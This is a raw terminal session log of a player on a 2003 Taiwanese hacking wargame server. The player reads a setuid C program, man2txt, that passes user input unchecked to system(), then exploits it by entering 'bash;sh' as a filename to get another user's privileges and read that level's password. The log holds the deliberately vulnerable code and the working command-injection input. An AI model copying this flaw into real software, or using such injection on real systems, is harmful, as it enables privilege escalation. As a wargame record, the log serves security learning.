Script started on ¦è¤¸2003¦~05¤ë29¤é (¶g¥|) 00®É33¤À45¬í
chihchun@chaos:~$ chihchun@chaos:~$ chihchun@chaos:~$ tchihchun@chaos:~$ tchihchun@chaos:~$ techihchun@chaos:~$ techihchun@chaos:~$ telchihchun@chaos:~$ telchihchun@chaos:~$ telnchihchun@chaos:~$ telnchihchun@chaos:~$ telnechihchun@chaos:~$ telnechihchun@chaos:~$ telnetchihchun@chaos:~$ telnetchihchun@chaos:~$ telnet chihchun@chaos:~$ telnet chihchun@chaos:~$ telnet ochihchun@chaos:~$ telnet ochihchun@chaos:~$ telnet oschihchun@chaos:~$ telnet oschihchun@chaos:~$ telnet osschihchun@chaos:~$ telnet osschihchun@chaos:~$ telnet oss.chihchun@chaos:~$ telnet oss.chihchun@chaos:~$ telnet oss.fchihchun@chaos:~$ telnet oss.fchihchun@chaos:~$ telnet oss.frchihchun@chaos:~$ telnet oss.frchihchun@chaos:~$ telnet oss.frechihchun@chaos:~$ telnet oss.frechihchun@chaos:~$ telnet oss.freechihchun@chaos:~$ telnet oss.freechihchun@chaos:~$ telnet oss.freebchihchun@chaos:~$ telnet oss.freebchihchun@chaos:~$ telnet oss.free[Kchihchun@chaos:~$ telnet oss.freechihchun@chaos:~$ telnet oss.free-chihchun@chaos:~$ telnet oss.free-chihchun@chaos:~$ telnet oss.free-bchihchun@chaos:~$ telnet oss.free-bchihchun@chaos:~$ telnet oss.free-bschihchun@chaos:~$ telnet oss.free-bschihchun@chaos:~$ telnet oss.free-bsdchihchun@chaos:~$ telnet oss.free-bsdchihchun@chaos:~$ telnet oss.free-bsd.chihchun@chaos:~$ telnet oss.free-bsd.chihchun@chaos:~$ telnet oss.free-bsd.ochihchun@chaos:~$ telnet oss.free-bsd.ochihchun@chaos:~$ telnet oss.free-bsd.orchihchun@chaos:~$ telnet oss.free-bsd.orchihchun@chaos:~$ telnet oss.free-bsd.orgchihchun@chaos:~$ telnet oss.free-bsd.org
Trying 140.123.20.201...
Connected to OSs.Free-BSD.Org.
Escape character is '^]'.
[2J
[2;17H[0;1;37mWelcome to Moon CrapsServer 777E (UNIX)[0m
[3;10H[33m +---------------------------------------------------+[0m
[4;10H[33m |[0m     [1;31mWargame Station of Taiwan Explorer Club      [0;33m |[0m
[5;10H[33m |[0m     [1;34mIP Addr. : 140.123.20.201                    [0;33m |[0m
[6;10H[33m |[0m     [1;32mHostname : OSs.Free-BSD.Org                  [0;33m |[0m
[7;10H[33m +---------------------------------------------------+[0m
[9;4H[33m[1;35m_____________________________________________________________________[m
[8;5H[0;36m12:03AM  up 2 days, 6 mins, 8 users, load averages: 1.11, 1.10, 1.14[0m[11;0H
[11;6H[1mTEC Login: [0mbs asic3
[12;6H[1mPass word:[0m
Last login: Thu May 29 00:02:04 from 61.70.194.51
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
	The Regents of the University of California.  All rights reserved.

[2J
[2;18H[0;1;37mWelcome to Moon CrapsServer 777E (UNIX)[0m
[3;11H[33m +---------------------------------------------------+[0m
[4;11H[33m |[0m     [1;31mWargame Station of Taiwan Explorer Club      [0;33m |[0m
[5;11H[33m |[0m     [1;34mIP Addr. : 140.123.20.201                    [0;33m |[0m
[6;11H[33m |[0m     [1;32mHostname : OSs.Free-BSD.Org                  [0;33m |[0m
[7;11H[33m +---------------------------------------------------+[0m
[9;4H[33m[1;35m===================================================================[m
[10;8HSince we invite you to come here...We hope you enjoy it.
[11;8HWe consider you hackers have idiosyncrasy of a real guru.
[12;8HSo you are allowed to do whatever you like on this server.
[13;8HHowever, you still have to abide by the followings:
[15;8H1. Making any DOS or DDOS attack to this machine is forbidden.
[16;8H2. Attacking other machines from here is forbidden.
[17;8H3. Keep the secrect of important passwords when you get root.
[19;8HThe source code will be open to those who pass the puzzles.
[20;8HLearn or expand your great knowledge of hacking happily here. :)
[22;50HWargame SYSOP of TEC.[23;0H
[24;6H[1;33mPress any key to continue....[0m
[2J
basic3 has logged on ttyp3 from 61.231.75.78.
basic9 has logged on ttyp4 from 140.123.20.11.
basic3 has logged on ttyp5 from 218.164.65.13.
basic3 has logged on ttyp7 from 61.70.194.51.
basic1 has logged on ttyp9 from 140.119.164.121.
basic5 has logged on ttypa from 140.113.27.161.
basic1 has logged on ttypb from 218.165.131.48.
basic1 has logged on ttypc from 140.123.20.123.
[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~ [0m][1m>[m ls
Pa55w0rd  [36mWWW[39;49m[m/      [36mbin[39;49m[m/      [36mtmp[39;49m[m/
[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~ [0m][1m>[m id
cuid=50003(basic3) gid=50003(basic3) groups=50003(basic3)
[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~ [0m][1m>[m cat Pa*
[2J[0;0H    __________                _                        __
  ."          ".          _.-(_)-._                _.-{__}-._
  | .--------. |        .'_________'.            .:-'`____`'-:.
 /` |________| `\      [_____________]          /_.-"`_  _`"-._\
|  / / .\/. \ \  |     /  / .\/. \   \         /`   / .\/. \   `\
\_/  \__/\__/  \_/    |   \__/\__/    |       |     \__/\__/     |
  \            /       \             /       .-\                /-.
  /'._  --  _.'\       /'._  --  _.'\       /   '._-.__--__.-_.'   \
 /_   `""""`   _\     /_   `""""`   _\     /`'.    `""""""""`    .'`\
(_|            |_)   (__/    '|    \ _)    |   |        '       |   |
   \__________/        |_____'|_____|      '-;`_________'________`;-'
   '----------'         '----------'         `--------------------`
     .--""--.
   .'        '.
  /   .'``'.   \
 |  .'/.\/.\'.  |
 |  : \_/\_/ ;  |
 \  '.\    /.'  /
  /'. `'--'` .'\            _____
 /_  `-./\.-'  _\          /¡ó ¡ó\          [1;30;47mDomain://CNA.CCu.Edu.Tw [0m
(_/            \_)        ( _____ )         [1;34;43mHostFunc://WargameShell [0m
|               |       .-|       |-.       [1;36;45mIPAddr://140.123.20.201 [0m
 '--------------'     __: _||___||_ ;__     [1;31;44mMembers: Hackers in TEC [0m
[13;20H    ________________________________________________[14;20H   /                                                \[15;20H   |                                                |[16;20H   |                                                |[17;20H   \______  ________________________________________/[18;20H          \/[14;25HCongratulation!![15;25HYou've got SUID Permission of "basic3" !![16;25HPa55w0rd is : [1;36;41m Default Value! [0m[23;0H
[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~ [0m][1m>[m cd ~basic4
[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~basic4 [0m][1m>[m ls
Pa55w0rd  [36mWWW[39;49m[m/      [36mbin[39;49m[m/      [36mtmp[39;49m[m/
[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~basic4 [0m][1m>[m cat Pa*
cat: Pa55w0rd: Permission denied
[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~basic4 [0m][1m>[m err
[K[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~basic4 [0m][1m>[m cd bin
[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~basic4/bin [0m][1m>[m ls
[30m[41mman2txt[39;49m[m*   man2txt.c
[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~basic4/bin [0m][1m>[m ls -AF
[30m[41mman2txt[39;49m[m*   man2txt.c
[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~basic4/bin [0m][1m>[m cat man2
[01;31mman2txt[00m*   [00mman2txt.c[00m  
[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~basic4/bin [0m][1m>[m cat man2txt.c 
/* This Ugly program is written in hurry...
   No other special significance but just for the test. */
#include <stdio.h>
main(){

  char str1[79], str2[79], cmd[200];

  printf("\nman2txt: Turning manpage of a command into a text file\n");
  printf("Version 1.0 CopyLeft (L) 2002 TEC\n");

  printf("\nWhich command? :  ");
  scanf("%s", str1);
  fpurge(stdin);

  printf("\nOutput filename? : ");
  scanf("%s", str2);
  fpurge(stdin);

  sprintf(cmd, "/bin/rm -rf /home/basic/4/tmp/%s 2> /dev/null", str2);
  system(cmd);
  printf("\nOutput file will be created at ~basic4/tmp\n");
  printf("\nStarting....\n\n");
  sprintf(cmd, "/usr/bin/man %s | /usr/bin/col -b > /home/basic/4/tmp/%s", str1, str2);
  system(cmd);
  printf("\nDone.\n\n\n");
  exit(0);
}
[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~basic4/bin [0m][1m>[m ......
[K[[1;33m[4mOSs[24m[0m][[1;35m[4mbasic3[24m[0m][[1;36m ~basic4/bin [0m][1m>[m ./man2txt 

man2txt: Turning manpage of a command into a text file
Version 1.0 CopyLeft (L) 2002 TEC

Which command? :  bash

Output filename? : bash;sh

id
uid=50003(basic3) euid=50004(basic4) gid=50003(basic3) groups=50003(basic3)
humm.. :D
cd ..
ls
Pa55w0rd        WWW             bin             tmp
cat p^?Pa^?^?^?




cat Pa*

[2J[0;0H    __________                _                        __
  ."          ".          _.-(_)-._                _.-{__}-._
  | .--------. |        .'_________'.            .:-'`____`'-:.
 /` |________| `\      [_____________]          /_.-"`_  _`"-._\
|  / / .\/. \ \  |     /  / .\/. \   \         /`   / .\/. \   `\
\_/  \__/\__/  \_/    |   \__/\__/    |       |     \__/\__/     |
  \            /       \             /       .-\                /-.
  /'._  --  _.'\       /'._  --  _.'\       /   '._-.__--__.-_.'   \
 /_   `""""`   _\     /_   `""""`   _\     /`'.    `""""""""`    .'`\
(_|            |_)   (__/    '|    \ _)    |   |        '       |   |
   \__________/        |_____'|_____|      '-;`_________'________`;-'
   '----------'         '----------'         `--------------------`
     .--""--.
   .'        '.
  /   .'``'.   \
 |  .'/.\/.\'.  |
 |  : \_/\_/ ;  |
 \  '.\    /.'  /
  /'. `'--'` .'\            _____
 /_  `-./\.-'  _\          /¡ó ¡ó\          [1;30;47mDomain://CNA.CCu.Edu.Tw [0m
(_/            \_)        ( _____ )         [1;34;43mHostFunc://WargameShell [0m
|               |       .-|       |-.       [1;36;45mIPAddr://140.123.20.201 [0m
 '--------------'     __: _||___||_ ;__     [1;31;44mMembers: Hackers in TEC [0m
[13;20H    ________________________________________________[14;20H   /                                                \[15;20H   |                                                |[16;20H   |                                                |[17;20H   \______  ________________________________________/[18;20H          \/[14;25HCongratulation!![15;25HYou've got SUID Permission of "basic4" !![16;25HPa55w0rd is : [1;36;41m Basic Injection! [0m[23;0H






telnet> q
Connection closed.
chihchun@chaos:~$ chihchun@chaos:~$ 
Script done on ¦è¤¸2003¦~05¤ë29¤é (¶g¥|) 00®É35¤À02¬í
